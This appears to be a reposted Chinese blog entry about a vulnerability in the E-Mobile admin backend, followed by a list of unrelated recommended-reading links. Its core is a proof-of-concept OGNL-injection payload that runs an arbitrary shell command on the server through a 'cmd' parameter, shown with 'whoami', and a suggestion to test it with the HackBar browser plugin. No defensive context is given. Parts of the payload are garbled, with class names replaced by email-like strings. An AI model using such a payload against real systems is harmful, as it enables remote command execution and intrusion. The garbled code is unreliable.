E-Mobile 后台管理系统漏洞
程序员文章站
2022-04-30 10:36:59
...
转载:https://blog.csdn.net/qq_27446553/article/details/68203308
E-Mobile 后台管理系统漏洞
可以通过火狐hackbar插件进行验证
Poc :
message=(#aaa@qq.com@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@aaa@qq.com(@aaa@qq.com().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami
复现图片如下:
下一篇: clipboard.js基本使用方法分享
推荐阅读
-
ASP.NET MVC4+EF5+EasyUI+Unity2.x注入的后台管理系统之前端页面框架构建源码分享
-
spring boot+thymeleaf+bootstrap实现后台管理系统界面
-
有美食餐饮管理系统后台连接打印机的设置方法
-
Asp.Net Core 轻松学-基于微服务的后台任务调度管理器
-
后台管理登录篇-asp设计与数据库
-
asp.net后台管理系统-登陆模块-路由权限控制_1
-
ASP.NET MVC5网站开发之用户角色的后台管理1(七)
-
vue-manage-system 后台管理系统开发总结
-
ASP.NET MVC5+EF6+EasyUI后台管理系统 微信公众平台开发之消息管理
-
详解vue后台系统登录态管理